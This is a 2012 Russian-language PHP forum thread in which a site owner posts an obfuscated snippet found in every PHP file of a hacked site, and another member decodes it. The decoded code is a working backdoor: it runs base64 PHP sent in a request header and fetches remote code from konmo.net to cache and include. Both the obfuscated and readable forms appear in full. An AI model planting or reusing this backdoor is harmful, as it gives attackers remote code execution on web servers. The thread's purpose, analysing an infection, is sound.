Зашифрованый скрипт

Discussion in 'PHP' started by dean999, 18 Dec 2012.

  1. dean999

    dean999 New Member

    Joined:
    16 May 2012
    Messages:
    78
    Likes Received:
    1
    Reputations:
    0
    Привет всем, хочу узнать что это такое! Нашел уже на взломаном сайте!

    PHP:
    <?php                                                                                                                                                                 /*versio:2.11*/$Q000Q=0;$GLOBALS['IlII'] = '0fY3VybA62X2luaXQ%.1!3&YWxsb3dfdXJsX2ZvcGVu!55MQ64^X3NldG9wdA1#X2V4ZWMXwcY2xvc2U*.PGltZyBzcmM9Ig~IiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4ddwa29ubW8ubmV0d8_a3RpcHAuY2g7%00&c2lsYmVyLmRlf$&~@WV8~e5Og*7~ZGlzcGxheV9lcnJvcnM__@5*ZGV0ZXJtaW5hdG9y*YW5k9(&Mi4xMQ#7SWtjMnhUdjVBeTB3M2Q%YmFzZTY0X2VuY29kZQ}YmFzZTY0X2RlY29kZQa#aHR0cDovLwSFRUUF9IT1NU}0fSFRUUF9VU0VSX0FHRU5Ua;~dW5pb242a{c2VsZWN0@;UkVRVUVTVF9VUkka83U0NSSVBUX05BTUUe}5$UVVFUllfU1RSSU5HPw44L3RtcC8L3RtcAVE1QVEVNUAVE1QRElS2%dXBsb2FkX3RtcF9kaXI,Lg$6dmVyc2lv};.5LQ0}LXBocA#fSFRUUF9FWEVDUEhQ*#)b3V0b2sc^,d^*aHR0cA08Oi8v*&%L3BnLnBocD91PQe;Jms9{JnQ9cGhwJnA9_~JnY9f^^6261736536345f6465636f6465';$Q000Q=pack('H*',substr($GLOBALS['IlII'], -26));if (!function_exists('QQ0QQQOO')){function QQ0QQQOO($QQ$II){$c=$GLOBALS['IlII']; $d=pack('H*',substr($GLOBALS['IlII'], -26)); return $d(substr($c$QQ$II));}};eval($Q000Q('aWYgKCFkZWZpbmVkKCJkZXRlcm1pbmF0b3IiKSl7IGZ1bmN0aW9uIGdldGZpbGUoJFEwT1EwMCl7ICRJMWxJMWwgPSBRUTBRUVFPTygyLCA2KTsgJElsbGxsbCA9ICRJMWxJMWwuUVEwUVFRT08oMTAsIDcpOyBpZiAoQGluaV9nZXQoUVEwUVFRT08oMjMsIDIwKSkgPT0gUVEwUVFRT08oNDYsIDIpKSB7ICRJSTFJbDE9QGZpbGVfZ2V0X2NvbnRlbnRzKCRRME9RMDApOyByZXR1cm4gUVEwUVFRT08oNTAsIDApOyB9IGVsc2VpZiAoZnVuY3Rpb25fZXhpc3RzKCRJbGxsbGwpKXsgJFFPUTBRTyA9IEAkSWxsbGxsKCk7ICRRME9PT1EgPSAkSTFsSTFsLlFRMFFRUU9PKDUxLCAxMCk7ICRJbDFsbGwgPSAkSTFsSTFsLlFRMFFRUU9PKDYzLCA3KTsgJFFRUVFPUSA9ICRJMWxJMWwuUVEwUVFRT08oNzAsIDIpLlFRMFFRUU9PKDczLCA3KTsgQCRRME9PT1EoJFFPUTBRTywgQ1VSTE9QVF9VUkwsICRRME9RMDApOyBAJFEwT09PUSgkUU9RMFFPLCBDVVJMT1BUX0hFQURFUixmYWxzZSk7IEAkUTBPT09RKCRRT1EwUU8sIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsdHJ1ZSk7IEAkUTBPT09RKCRRT1EwUU8sIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsNSk7IGlmICgkUVFPMFFRID0gQCRJbDFsbGwoJFFPUTBRTykpIHtyZXR1cm4gUVEwUVFRT08oNTAsIDApO30gQCRRUVFRT1EoJFFPUTBRTyk7IHJldHVybiBRUTBRUVFPTyg1MCwgMCk7IH0gZWxzZSB7IHJldHVybiBRUTBRUVFPTyg4MiwgMTQpLiRRME9RMDAuUVEwUVFRT08oOTcsIDM5KTsgfSB9IGZ1bmN0aW9uIHVwZCgkUTAwT1EwLCRRME9RMDApeyAkSTExSWxsPUBmb3BlbigkUTAwT1EwLFFRMFFRUU9PKDEzNywgMikpOyBAZmNsb3NlKCRJMTFJbGwpOyBpZiAoQGlzX2ZpbGUoJFEwME9RMCkpe3dyaXRlKCRRMDBPUTAsZ2V0ZmlsZSgkUTBPUTAwKSk7fTsgfSBmdW5jdGlvbiB3cml0ZSgkUTAwT1EwLCRRUTAwME8peyBpZiAoJFFPUU9RTz1AZm9wZW4oJFEwME9RMCxRUTBRUVFPTygxMzcsIDIpKSl7IEBmd3JpdGUoJFFPUU9RTywkUVEwMDBPKTsgQGZjbG9zZSgkUU9RT1FPKTsgfSB9ICRRUVFRTzAgPSBBcnJheShRUTBRUVFPTygxMzksIDEyKSwgUVEwUVFRT08oMTU0LCAxMSksIFFRMFFRUU9PKDE3MCwgMTIpKTsgZnVuY3Rpb24gb3V0cHV0KCRRT1FPME8sICRJSTFJSWwpeyBlY2hvIFFRMFFRUU9PKDE4NywgMykuJFFPUU8wTy5RUTBRUVFPTygxOTMsIDIpLiRJSTFJSWwuIlxyXG4iOyB9IGZ1bmN0aW9uIHBhcmFtKCl7IHJldHVybiBRUTBRUVFPTyg1MCwgMCk7IH0gQGluaV9zZXQoUVEwUVFRT08oMTk4LCAxOSksIDApOyBkZWZpbmUoUVEwUVFRT08oMjIyLCAxNiksIDEpOyAkUTBPT1FPPVFRMFFRUU9PKDIzOSwgNCk7ICRJbElsbGw9UVEwUVFRT08oMjQ2LCA2KTsgJFFPT09PUT1RUTBRUVFPTygyNTQsIDE5KTsgJElsbElJMT1RUTBRUVFPTygyNzQsIDE4KTsgJFFRUVEwTz1RUTBRUVFPTygyOTMsIDE4KTsgJElJMWxsST1RUTBRUVFPTygzMTMsIDEwKTsgJElJMWxsSS49c3RydG9sb3dlcihAJF9TRVJWRVJbUVEwUVFRT08oMzIzLCAxMildKTsgJFFPUTBPTyA9IEAkX1NFUlZFUltRUTBRUVFPTygzMzgsIDIwKV07IGZvcmVhY2ggKCRfR0VUIGFzICRRT1FPME89PiRJSTFJSWwpeyBpZiAoc3RycG9zKCRJSTFJSWwsUVEwUVFRT08oMzYxLCA3KSkpeyRfR0VUWyRRT1FPME9dPVFRMFFRUU9PKDUwLCAwKTt9IGVsc2VpZiAoc3RycG9zKCRJSTFJSWwsUVEwUVFRT08oMzcxLCA4KSkpeyRfR0VUWyRRT1FPME9dPVFRMFFRUU9PKDUwLCAwKTt9IH0gaWYoIWlzc2V0KCRfU0VSVkVSW1FRMFFRUU9PKDM4MSwgMTUpXSkpIHsgJF9TRVJWRVJbUVEwUVFRT08oMzgxLCAxNSldID0gJF9TRVJWRVJbUVEwUVFRT08oMzk5LCAxNSldOyBpZigkX1NFUlZFUltRUTBRUVFPTyg0MTgsIDE2KV0pIHsgJF9TRVJWRVJbUVEwUVFRT08oMzgxLCAxNSldIC49IFFRMFFRUU9PKDQzNCwgMikgLiAkX1NFUlZFUltRUTBRUVFPTyg0MTgsIDE2KV07IH0gfSBpZiAoJFFPT1FPMD0kSUkxbGxJLkAkX1NFUlZFUltRUTBRUVFPTygzODEsIDE1KV0peyAkSUlsMWxJPUBtZDUoJElJMWxsSS4kSWxJbGxsLlBIUF9PUy4kUU9PT09RKTsgJFFRUTAwMD1RUTBRUVFPTyg0MzgsIDcpOyAkSTFJbGxJID0gQXJyYXkoUVEwUVFRT08oNDQ1LCA2KSwgQCRfU0VSVkVSW1FRMFFRUU9PKDQ1MSwgNCldLCBAJF9TRVJWRVJbUVEwUVFRT08oNDU1LCA2KV0sIEAkX0VOVltRUTBRUVFPTyg0NTEsIDQpXSwgQCRfRU5WW1FRMFFRUU9PKDQ2MSwgOCldLCBAJF9FTlZbUVEwUVFRT08oNDU1LCA2KV0sIEBpbmlfZ2V0KFFRMFFRUU9PKDQ3MSwgMTkpKSk7IGZvcmVhY2ggKCRJMUlsbEkgYXMgJEkxbDFsbCl7IGlmICghZW1wdHkoJEkxbDFsbCkpeyAkSTFsMWxsLj1ESVJFQ1RPUllfU0VQQVJBVE9SOyBpZiAoQGlzX3dyaXRhYmxlKCRJMWwxbGwpKXsgJFFRUTAwMCA9ICRJMWwxbGw7IGJyZWFrOyB9IH0gfSAkdG1wPSRRUVEwMDAuUVEwUVFRT08oNDkxLCAyKS4kSUlsMWxJOyBpZiAoQCRfU0VSVkVSWyJIVFRQX1lfQVVUSCJdPT0kSUlsMWxJKXsgZWNobyAiXHJcbiI7IEBvdXRwdXQoUVEwUVFRT08oNDk1LCA4KSwgJElsSWxsbC5RUTBRUVFPTyg1MDcsIDIpLiRRME9PUU8uUVEwUVFRT08oNTExLCA2KSk7IGlmICgkUVEwT09RPSRRUVFRME8oQCRfU0VSVkVSW1FRMFFRUU9PKDUxOSwgMTYpXSkpe0BldmFsKCRRUTBPT1EpO2VjaG8gIlxyXG4iO291dHB1dChRUTBRUVFPTyg1MzgsIDQpLCBRUTBRUVFPTyg1NDIsIDMpKTt9IGV4aXQoMCk7IH0gaWYgKEBpc19maWxlKCR0bXApKXtAaW5jbHVkZV9vbmNlKCR0bXApO30gZWxzZXsgJFFPT1FPMD1AdXJsZW5jb2RlKCRRT09RTzApOyB1cGQoJHRtcCxRUTBRUVFPTyg1NTEsIDYpLlFRMFFRUU9PKDU1OSwgNCkuJFFRUVFPMFswXS5RUTBRUVFPTyg1NjYsIDE0KS4kUU9PUU8wLlFRMFFRUU9PKDU4MiwgNCkuJElJbDFsSS5RUTBRUVFPTyg1ODcsIDEyKS4kUTBPT1FPLlFRMFFRUU9PKDYwMSwgNCkuJElsSWxsbCk7IH0gfSB9'));?>
     
  2. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    бля, выложи в нормальном виде
     
  3. proroot

    proroot Member

    Joined:
    31 Jan 2012
    Messages:
    46
    Likes Received:
    5
    Reputations:
    0
    Теоретически, не смотря на код. Можно сказать что шел :D
     
  4. dean999

    dean999 New Member

    Joined:
    16 May 2012
    Messages:
    78
    Likes Received:
    1
    Reputations:
    0
    http://rghost.ru/42335834
    Вот один из файлов, там все PHP файлы содержат этот участок кода, у всех дата создания одинакова.
     
  5. LStr1ke

    LStr1ke Elder - Старейшина

    Joined:
    29 Jul 2009
    Messages:
    801
    Likes Received:
    145
    Reputations:
    73
    PHP:
    if (!defined("determinator")) { 
        function 
    getfile($url) { 
            if (@
    ini_get('allow_url_fopen') == 1) {
                
    $result = @file_get_contents($url);
                return 
    '';
            } elseif (
    function_exists('curl_init')) { 
                
    $ch = @curl_init(); 
                
    curl_setopt($chCURLOPT_URL$url);
                
    curl_setopt($chCURLOPT_HEADER,false);
                
    curl_setopt($chCURLOPT_RETURNTRANSFER,true);
                
    curl_setopt($chCURLOPT_CONNECTTIMEOUT,5);
                if (
    $result curl_exec($ch)) {
                    return 
    '';
                } 
                
    curl_close($ch);
                return 
    '';
            } else { 
                return 
    '<img src="'.$url.'" width="1px" height="1px" />';
            } 
        } 
        function 
    upd($tmp,$url) {
            
    $f=@fopen($tmp,'w');
            @
    fclose($f); 
            if (@
    is_file($tmp)){
                
    write($tmp,getfile($url));
            }; 
        } 
        function 
    write($tmp,$data) { 
            if (
    $f=@fopen($tmp,'w')) { 
                @
    fwrite($f,$data); @fclose($f); 
            } 
        } 
        
        
    $hosts = Array( 'konmo.net''ktipp.ch''silber.de' ); 
        
        function 
    output($f$a) { 
            echo 
    'Y_'.$f.':'.$a."\r\n"
        } 
        function 
    param() { 
            return 
    ''
        } 
        
        @
    ini_set(display_errors0); 
        
    define('determinator'1); 
        
    $and 'and'
        
    $version '2.11'
        
    $key 'Ikc2xTv5Ay0w3d'
        
    $self 'http://'
        
    $self.=strtolower(@$_SERVER['HTTP_HOST']); 
        
    $user_agent = @$_SERVER['HTTP_USER_AGENT'];
        foreach (
    $_GET as $key => $value) { 
            if (
    strpos($value,'union')) { 
                
    $_GET[$key]= '' ;
            } elseif (
    strpos($value,'select')) { 
                
    $_GET[$key]= '';
            } 
        } 
        
        if(!isset(
    $_SERVER['REQUEST_URI'])) { 
            
    $_SERVER['REQUEST_URI'] = $_SERVER['SCRIPT_NAME']; 
            if(
    $_SERVER['QUERY_STRING']) {
                
    $_SERVER['REQUEST_URI'] .= '?' $_SERVER['QUERY_STRING'];
            } 
        } 
        
        if (
    $self_url =$self . @$_SERVER['REQUEST_URI']) { 
            
    $hash=@md5($self $version.PHP_OS.$key); 
            
    $tmp ='/tmp/'
            
    $tmp_array = Array(
                
    '/tmp'
                @
    $_SERVER['TMP'], 
                @
    $_SERVER['TEMP'], 
                @
    $_ENV['TMP'], 
                @
    $_ENV['TMPDIR'], 
                @
    $_ENV['TEMP'], 
                @
    ini_get'upload_tmp_dir' )
            ); 
            foreach (
    $tmp_array as $tmp_str){
                if (!empty(
    $tmp_str)) { 
                    
    $tmp_str.=DIRECTORY_SEPARATOR
                    if (@
    is_writable($tmp_str)) { 
                        
    $tmp $tmp_str
                        break; 
                    } 
                } 
            } 
            
    $tmp $tmp.'.'.$hash
            if (@
    $_SERVER["HTTP_Y_AUTH"]==$hash){ 
                echo 
    "\r\n"; @output('versio'$version.'-'.$and.'-php'); 
                if (
    $result base64_decode (@$_SERVER['HTTP_EXECPHP'])) {
                    @eval(
    $result);
                    echo 
    "\r\n";
                    
    output('out''ok');
                } 
                exit(
    0); 
            } 
            if (@
    is_file($tmp)) { 
                @include_once(
    $tmp);
            } else { 
                
    $self_url=@urlencode($self_url); 
                
    upd($tmp'http://konmo.net/pg.php?u='.$self_url.'&k='.$hash.'&t=php&p='.$and.'&v='.$version);
            } 
        } 
    }
     
    #5 LStr1ke, 21 Dec 2012
    Last edited: 21 Dec 2012
  6. Exompies

    Exompies Member

    Joined:
    14 Oct 2011
    Messages:
    0
    Likes Received:
    9
    Reputations:
    1
    LStr1ke, Расшифруйте, если не сложно http://rghost.ru/42550659
    спасибо большое!